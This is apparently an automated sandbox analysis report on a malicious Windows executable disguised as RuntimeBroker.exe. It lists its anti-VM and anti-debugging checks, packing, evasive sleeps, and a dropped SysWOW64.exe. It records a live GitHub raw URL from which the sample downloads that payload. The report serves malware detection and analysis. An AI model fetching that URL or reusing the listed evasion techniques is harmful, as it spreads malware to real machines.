Edit tour

Windows Analysis Report
RuntimeBroker.exe

Overview

General Information

Sample name:RuntimeBroker.exe
Analysis ID:1651706
MD5:61fd0424631fc50f17989c516950935e
SHA1:8b616f88f47a9aa473512a91a8b3b39a7949aff7
SHA256:c829147f0697e5a7c72e6aaac0b092b4d2a5e3d6a0132d540c49d2ea432877b9
Tags:exeuser-zhuzhu0009
Infos:

Detection

Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • RuntimeBroker.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\RuntimeBroker.exe" MD5: 61FD0424631FC50F17989C516950935E)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\Desktop\RuntimeBroker.exe", CommandLine: "C:\Users\user\Desktop\RuntimeBroker.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\RuntimeBroker.exe, NewProcessName: C:\Users\user\Desktop\RuntimeBroker.exe, OriginalFileName: C:\Users\user\Desktop\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Users\user\Desktop\RuntimeBroker.exe", ProcessId: 7788, ProcessName: RuntimeBroker.exe
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\RuntimeBroker.exe, ProcessId: 7788, TargetFilename: C:\Users\user\AppData\Local\Temp\{8432FDIJOFS-82490FDS-FDSFDU-489324FDS-3Y58FDJ-893UFDS-53HFDJOPFH-GDS94590349-FDSFFDS}\SysWOW64.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: RuntimeBroker.exeAvira: detected
Source: RuntimeBroker.exeReversingLabs: Detection: 38%
Source: Submited SampleNeural Call Log Analysis: 96.1%
Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: RuntimeBroker.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global trafficHTTP traffic detected: GET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 140.82.114.4 140.82.114.4
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: 35.56.3.0.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49712 version: TLS 1.2

System Summary

barindex
Source: RuntimeBroker.exeStatic PE information: section name:
Source: RuntimeBroker.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_058475900_2_05847590
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_05848D200_2_05848D20
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_05841C880_2_05841C88
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_05840CA80_2_05840CA8
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_05846CC00_2_05846CC0
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_058499C00_2_058499C0
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_058411C80_2_058411C8
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_058469780_2_05846978
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_05840C980_2_05840C98
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_058499B00_2_058499B0
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_058480280_2_05848028
Source: RuntimeBroker.exe, 00000000.00000002.1546987185.0000000001212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RuntimeBroker.exe
Source: RuntimeBroker.exeStatic PE information: Section: w7 ZLIB complexity 1.0035807291666667
Source: classification engineClassification label: mal92.evad.winEXE@1/0@4/2
Source: C:\Users\user\Desktop\RuntimeBroker.exeMutant created: NULL
Source: C:\Users\user\Desktop\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\{8432FDIJOFS-82490FDS-FDSFDU-489324FDS-3Y58FDJ-893UFDS-53HFDJOPFH-GDS94590349-FDSFFDS}Jump to behavior
Source: RuntimeBroker.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\RuntimeBroker.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: RuntimeBroker.exeReversingLabs: Detection: 38%
Source: C:\Users\user\Desktop\RuntimeBroker.exeFile read: C:\Users\user\Desktop\RuntimeBroker.exeJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: RuntimeBroker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RuntimeBroker.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\RuntimeBroker.exeUnpacked PE file: 0.2.RuntimeBroker.exe.bc0000.0.unpack :EW;Unknown_Section1:ER;Unknown_Section2:R;.Enigma:EW;UPX:ER;zjifahsi:R;.UPX:R;.reloc:R; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:EW;Unknown_Section4:ER;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;
Source: RuntimeBroker.exeStatic PE information: 0xA6EAA72C [Fri Sep 27 23:47:56 2058 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: UPX
Source: RuntimeBroker.exeStatic PE information: section name: w7
Source: RuntimeBroker.exeStatic PE information: section name:
Source: RuntimeBroker.exeStatic PE information: section name:
Source: RuntimeBroker.exeStatic PE information: section name: .Enigma
Source: RuntimeBroker.exeStatic PE information: section name: UPX
Source: RuntimeBroker.exeStatic PE information: section name: zjifahsi
Source: RuntimeBroker.exeStatic PE information: section name: .UPX
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_05844532 pushfd ; iretd 0_2_05844531
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_058444E2 pushfd ; iretd 0_2_05844531
Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_0584696D pushfd ; iretd 0_2_05846975
Source: RuntimeBroker.exeStatic PE information: section name: w7 entropy: 7.939048109812574
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\RuntimeBroker.exeMemory allocated: 3320000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeMemory allocated: 3320000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeMemory allocated: 5320000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sysJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sysJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sysJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599884Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599755Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599625Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599494Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599364Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599219Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599028Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598911Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598793Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598672Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598562Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598453Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598344Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598234Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeWindow / User API: threadDelayed 1048Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeWindow / User API: threadDelayed 1530Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7884Thread sleep count: 1048 > 30Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7884Thread sleep count: 1530 > 30Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -599884s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -599755s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -599625s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -599494s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -599364s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -599219s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -599028s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -598911s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -598793s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -598672s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -598562s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -598453s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -598344s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876Thread sleep time: -598234s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\RuntimeBroker.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599884Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599755Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599625Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599494Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599364Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599219Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 599028Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598911Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598793Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598672Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598562Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598453Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598344Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeThread delayed: delay time: 598234Jump to behavior
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q"SOFTWARE\VMware, Inc.\VMware Tools
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'C:\WINDOWS\system32\drivers\vmmouse.sys
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RuntimeBroker.exe, 00000000.00000002.1548099069.00000000012CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
